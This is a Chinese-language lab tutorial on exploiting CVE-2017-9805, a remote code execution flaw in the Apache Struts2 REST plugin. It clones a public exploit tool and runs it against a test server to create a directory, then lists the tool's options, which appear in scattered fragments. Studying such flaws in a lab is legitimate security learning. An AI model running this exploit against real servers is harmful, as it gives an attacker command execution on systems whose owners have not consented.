CVE-2017-9805简单利用

张 漏洞利用 6 年前
1.32W 0
华盟原创文章投稿奖励计划

漏洞背景

2017年9月5日,Apache Struts 2官方发布了一个严重级别的安全漏洞公告,该漏洞由国外安全研究组织lgtm.com的安全研究人员发现,公告称Apache Struts2的REST插件存在远程代码执行的高危漏洞, Struts2 REST插件的XStream组件存在反序列化漏洞,使用带有 XStream实例的 XStreamHandler进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。在一定条件下,攻击者可以利用该漏洞远程发送精心构造的恶意数据包,获取业务数据或服务器权限,存在高安全风险。

漏洞影响范围

Struts 2.3.x全系版本(根据实际测试,2.3版本也存在该漏洞)
Struts 2.5 - Struts 2.5.12

实验环境


靶机:192.168.123.16  (centos7)
攻击机:1192.168.123.157(Kali)

CVE-2017-9805利用


下载CVE-2017-9805
git clone 

https://github.com/mazen160/struts-pwn_CVE-2017-9805


进入目录,运行struts-pwn.py在/下创建一个ok目录 

  • cd struts-pwn_CVE-2017-9805python  struts-pwn.py --exploit --url 'http://192.168.123.16:8080/orders.xhtml'
  •  -c 'mkdir /ok'



		
	



		参数
	


    

  • 

    -h, --help 
    

    • 

  • 

    show this help message and exit-u URL, --url URL
    

    • 

  • 

    Check a single URL.-l USEDLIST, --list USEDLIST Check a list of URLs.-c CMD, --cmd CMD
    

    • 

  • 

    Command to execute. (Default: 'touch /tmp/struts-pwn')--exploit
    

    • 

  • 

    Exploit.
    

    • 



    



		
	



		查看centos7的/下有没有ok目录
	



		
	



		
	



		CVE-2017-9805简单利用
	



		

注:本实验不得用于商业用途,仅做学习交流,一切后果自行承担。
	



		
	





                        

                            


    CVE-2017-9805(2),严重漏洞(2),漏洞利用(21),漏洞预警(4)


本文原创,作者:张,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/262487.html

    

        张官方    

    

        

            
        

        

                    

    

    
    

                1.49K篇文章
        83M总阅读量
    





    




                    

                    
                                        
                    

        
            
    

                

                
                



    

        相关文章    

    


                
                

    

	

		
发表回复